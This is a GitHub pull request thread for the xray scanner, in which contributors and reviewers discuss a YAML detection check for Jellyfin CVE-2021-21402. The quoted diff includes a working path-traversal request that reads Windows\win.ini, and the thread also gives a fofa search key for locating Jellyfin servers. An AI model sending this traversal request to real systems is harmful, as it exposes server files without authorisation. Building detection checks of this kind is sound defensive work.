Create poc-yaml-Jellyfin-cve-2021-21402
chaitin/xray pull request #1183
Opened 2021-04-13 11:34 UTC by YAN-laa

**请先认真阅读下列要求，如不符合会被直接关闭 PR**

- 确保当前 POC 与已有的 POC 没有重复，除了仓库 `pocs` 目录中的，还有内置的几个用 Go 写的 POC也不要重复：
  ```
  poc-go-php-cve-2019-11043-rce
  poc-go-seeyon-htmlofficeservlet-rce
  poc-go-tongda-lfi-upload-rce
  poc-go-tongda-arbitrary-auth
  poc-go-ecology-dbconfig-info-leak
  poc-go-tomcat-put
  poc-go-tomcat-cve-2020-1938
  ```
  
- 阅读规范和要求 
  - https://chaitin.github.io/xray/#/guide/contribute
  - https://chaitin.github.io/xray/#/guide/high_quality_poc

- 一个 pull request 只提交一个 poc

- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员

 - 不接受没有测试环境的 poc，测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps)，也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址，如果有特殊情况，请私聊群内管理解决。
 
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。

**我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可，否则不予通过。**

----------

## 本 poc 是检测什么漏洞的

## 测试环境

## 备注

2021-04-13 11:59 UTC, YAN-laa commented
fofa: title="jellyfin"

2021-04-13 12:00 UTC, YAN-laa commented
这个漏洞为，任意文件读取漏洞

2021-04-16 04:35 UTC, virusdefender requested changes

2021-04-16 04:35 UTC, virusdefender commented on pocs/jellyfin-cve-2021-21402.yml
> +      response.status == 200 && response.body.bcontains(b"file")
这个匹配太容易误报了，可以读取下这个软件自己的一些文件之类的。

2021-04-16 16:04 UTC, YAN-laa commented
我已经重新优化了一下规则，麻烦您看一下



------------------&nbsp;原始邮件&nbsp;------------------
发件人: ***@***.***&gt;; 
发送时间: 2021年4月16日(星期五) 中午12:35
收件人: ***@***.***&gt;; 
抄送: ***@***.***&gt;; ***@***.***&gt;; 
主题: Re: [chaitin/xray] Create poc-yaml-Jellyfin-cve-2021-21402 (#1183)





 
@virusdefender requested changes on this pull request.
 
 
In pocs/jellyfin-cve-2021-21402.yml:
 &gt; @@ -0,0 +1,13 @@ +name: poc-yaml-jellyfin-cve-2021-21402 +rules: +  - method: GET +    path: "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" +    headers: +      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.1597.112 Safari/537.36 +    expression: | +      response.status == 200 &amp;&amp; response.body.bcontains(b"file")  
这个匹配太容易误报了，可以读取下这个软件自己的一些文件之类的。
 
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.

2021-04-22 02:31 UTC, smile-jpg commented on pocs/jellyfin-cve-2021-21402.yml
> +      response.status == 200 && response.headers["Vary"] == "Accept-Encoding" && response.headers["Access-Control-Allow-Credentials"] == "true"
规则还是太弱了，https://fofa.so/result?qbase64=aGVhZGVyPSJWYXJ5OiBBY2NlcHQtRW5jb2RpbmciICYmIGhlYWRlcj0iQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUi  建议参考其他任意文件读取漏洞的 PoC

2021-04-28 03:12 UTC, YAN-laa reviewed
这个poc可以检查windows也可以检查linux，因为读取的是程序内部文件

2021-04-28 03:12 UTC, YAN-laa commented on pocs/jellyfin-cve-2021-21402.yml
> +      response.status == 200 && response.headers["Vary"] == "Accept-Encoding" && response.headers["Access-Control-Allow-Credentials"] == "true"
我现在加入了判断文件类型，而且读取的是程序的内部文件，应该不会出现该问题了

2021-04-29 09:48 UTC, smile-jpg commented on pocs/jellyfin-cve-2021-21402.yml
> +      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.1597.112 Safari/537.36
不要在 poc 内添加与 poc 无关的请求头

2021-04-29 09:50 UTC, smile-jpg commented on pocs/jellyfin-cve-2021-21402.yml
> +    - "https://jellyfin.org/"
这里需要改为漏洞参考链接，参见：https://docs.xray.cool/#/guide/contribute?id=poc-%e8%b4%a1%e7%8c%ae%e8%a7%84%e8%8c%83

2021-04-29 10:23 UTC, YAN-laa commented on pocs/jellyfin-cve-2021-21402.yml
> +    - "https://jellyfin.org/"
已经删除多余的请求头并附上了漏洞的复现文章

2021-04-30 00:31 UTC, YAN-laa commented on pocs/jellyfin-cve-2021-21402.yml
> +      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.1597.112 Safari/537.36
已修改

2021-05-15 02:01 UTC, YAN-laa reviewed
已更改

2021-05-15 02:02 UTC, YAN-laa reviewed
已解决

2021-08-03 02:26 UTC, smile-jpg commented
合并了 #1376，这个就先关了，感谢提交

2021-08-03 02:26 UTC, closed without merging